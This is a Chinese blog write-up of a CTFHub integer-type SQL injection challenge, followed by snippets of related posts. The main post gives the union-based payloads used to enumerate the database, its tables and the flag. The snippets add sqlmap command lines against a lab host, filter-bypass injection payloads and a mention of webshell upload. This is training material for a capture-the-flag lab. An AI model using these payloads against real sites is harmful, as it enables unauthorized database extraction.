CTFHUB-SQL注入-整数型

已于 2023-07-31 21:00:19 修改
阅读量143 收藏
点赞数
文章标签: web安全
于 2023-07-31 20:58:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49539962/article/details/132029891
版权

工具

        使用Hackbar工具,安装参考hackbar安装教程

原题

解题过程

       解题需要先判断注入点,然后依次通过注入点找到服务器数据库的名字、列的名字,最后找到存储在数据库中的flag。

        先按照题目的提示输入一个“1”看看结果。搜索语句和两个结果都看到了。 

        库有两列。

order by 2

-1 union select 1,2

         下面就要找出数据库的名字。这就知道了,数据库叫sqli。

-1 union select database(),2

        接下来找列名(用database()好像不用知道数据库名)。现在我们知道第一

列就叫flag了。 

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()

         往flag列中查找flag即可。

-1  union select 8,flag from sqli.flag

mysmartwish
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
利用sqlmap注入获取flag
weixin_43910033的博客
01-21 4520
准备注入网址:http://192.168.129.129:8079 (需要自己搭建) 注入点:id 1.注入语句: python sqlmap.py -u "http://192.168.129.129:8079/?id=1" 2.得到数据库是MySQL,进一步获取数据库信息。 python sqlmap.py -u "http://192.168.129.129:8079/?id=1" --dbs 3.得到可用的数据库,查询数据库里面的表以获取表信息 python sqlmap.py -u "
sql注入第一关
weixin_70464248的博客
01-30 1151
使用共享存储方式: 在共享存储方式下,负载均衡器会将webshell文件存储在共享存储设备上,而不是存储在后端服务器上。这样,无论请求被转发到哪台服务器,都可以访问到相同的webshell文件,实现了连接的共享和一致性。nginx解析漏洞是指由于nginx的配置问题,导致nginx将以'.php'结尾的文件交给fastcgi处理,从而可能导致恶意用户上传包含PHP代码的文件并执行。需要注意的是,负载均衡下的webshell连接可能会面临一些挑战,比如文件分片上传导致文件被拆分到不同的后端服务器上。
2024年最新CTF Web SQL注入专项整理(持续更新中)_ctf sql注入,一文轻松搞定
最新发布
2401_84973202的博客
05-11 1315
使用right()突破字符限制得到后一段flag值b-403a-8062-80f219ca1c30}好了大家已经明显看到了^和()绕过不同限制的区别那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)使用right()突破字符限制原文链接:https://blog.csdn.net/m0_73734159/article/details/134450773。
常规SQL注入(整型注入)
hxhabcd123的博客
08-29 1505
常规SQL注入(整型注入)
sql注入一般流程(附例题)
热门推荐
Battery的博客
08-03 12万+
在与服务器数据库进行数据交互的地方拼接了恶意的sql代码,达到欺骗服务器执行恶意代码的目的。本质上是程序把用户输入的数据当成了sql语句执行。
简单sql注入超详细原理
qq_45951598的博客
10-01 2707
一、手工注入 我们这边搭建的环境是sqli-labs-master。 链接:https://github.com/Audi-1/sqli-labs 安装: 首先安装phpstudy或者xampp 将下载的文件解压发在:phpstudy的WWW文件夹里 或者 xampp里面的htdocs文件夹里面 修改mysql文件的账号密码 在sqli-labs-master\sql-connections里面有个db-creds.inc文件,打开并修改账号密码。 点击第一个:Setup/reset Database
使用sqlmap + burpsuite sql工具注入拿flag
太阳照耀我走四方
02-13 1690
简单的渗透工具sqlmap使用
centos云服务器安装cs(cobaltstrike4
2401_84253380的博客
04-26 300
wget https://repo.huaweicloud.com/java/jdk/8u201-b09/jdk-8u201-linux-x64.tar.gz #下载jdk压缩包tar -zxvf jdk-8u201-linux-x64.tar.gz #解压解压完之后生成一个jdk1.8.0_201文件mv jdk1.8.0_201 /usr/local/jdk1.8/ #把jdk1.8.0_201文件移动到usr/local/jdk1.8/目录下配置环境变量。
实验吧——(web)简单的SQL注入1、2 writeup
qq_39480875的博客
05-22 508
判断注入类型 输入:1 输入:1’ 出现报错,初步猜测这是一个字符型的注入。 尝试一些基本的语句: 输入: 1' union select schema_name from information_schema.schemata where '1' ='1 又出现报错。union select被过滤 测试了几个关键词以后,发现都被过滤了 关键词被过滤:解决方法如下 1大小写交替: Ord...
sqlmap详解及实战拿flag
weixin_43996007的博客
12-19 4538
sqlmap详解及实战拿flag 一、sqlmap介绍 sqlmap是一个非常强大的自动化SQL注入工具,其主要功能是扫描,发现并利用SQL注入漏洞。sqlmap工具支持多种sql注入技术,它们分别是: 1)基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2)基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3)基于报...
在sqli-liabs学习SQL注入之旅(第一关~第十关)
guanjian_ci的博客
04-20 3934
第一关 第一步:判断参数的类型 ?id=1' 页面报错 ?id=1' --+ 页面正常 判断参数接受类型为 字符型 查看第一关源码:$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 证明我们的判断正确! 第二步:猜解字段 ?id=1' order by 3 --+ 页面正常 ?id=1' order by 4 --+ 页面报错 判断字段长度为 3 第三步:爆数据库名 ?id=-
SQL注入实战第一个flag
qq_41904330的博客
08-04 6115
SQL注入实战: 登陆的是墨者平台的这个SQL实战 登陆进去后我们进行用burp进行抓包: 进行抓包获取后发送到重新器中: 看到当order by为5的时候报错了说明字段数少于5那么试一下order by 4# 发现order by 4# 没有报错说明字段数为4 我们检测一下输入的点用 select 1,2,3,4#来检测一下都在什么位置 我们来查看数据库名称:查出来为mozhe_di...
CTFHUB——整数型SQL注入
陈艺秋的博客
01-14 1258
整型SQL注入
SQL注入:sqli第一关详细讲解
m0_50818626的博客
05-23 1235
第七步:现在我们知道了所用的库为security,所用的表是users,三个字段名分别为id,username,password,那么我们就可以进行最后一步,查询username和password的具体数据。第六步:现在我们知道了security数据库中的所有表名,我们需要查询password和username,常理下这些数据都会存储到users中,所以我们现在查询users这个表中的所有字段的名字是什么。第二步:order by 查询字段个数,逐级增加order by 后面的数字,直到报错。
CTFHUB--技能树SQL注入{字符型注入}
lulu001128的博客
12-03 822
CTFHUB--技能树SQL注入{字符型注入}解题过程
CTFSHOW WEB入门——sql注入
Chur的博客
07-22 4180
ctfshow 靶场 web入门 sql注入系列
SQL注入(一)
weixin_49959448的博客
04-25 405
SQL注入 什么是SQL注入SQL注入本质:把用户输入的信息当作代码执行 需要满足两个条件: 1. 用户能够控制输入 2. 原本程序要执行的代码,拼接了用户输入的数据然后进行执行 靶场练习——显错注入(一) 显错注入(一) 1. 先确定是否是显错注入 id=1时显示这个结果 id=2时显示不同结果,说明可能存在显错注入 原理:根据传参值的变化页面在不断改变 原因: 1.php代码里写了if等分支语句 2.这个地方从数据库里提取信息然后展露出来 如果一个网站针对id=1,id=2做条件判断再输出,十分
【sql常见注入方法3种】--靶场lovesql
m0_63241485的博客
09-02 1536
sqlmap使用,手动sql注入,其他sql注入工具使用
buuctf 刷题5(sql注入篇)
weixin_63231007的博客
05-10 4002
sql注入挺难的我感觉,但是很重要,有好多绕过,和注入手段需要一步步在尝试,因此本章刷一下buuctf各个sql注入题目,来巩固联系一下自己在sql注入方面的知识。 [极客大挑战 2019]HardSQL 1 输入1',出错,1'#显示不同,存在单引号闭合注入。 order by查字段,union,堆叠注入,和输入数字都烦返回错误 =,空格,和好多关键字都被过滤了。 空格用()绕过,=用like绕过。 尝试报错注入: 1'or(updatexml(1,concat...
ctfhub sql注入
10-09
CTFHub是一个CTF(Capture The Flag)竞赛平台,其中包含了各种类型的安全挑战,包括SQL注入SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以利用它来绕过应用程序的身份验证、访问未授权的数据或执行恶意操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值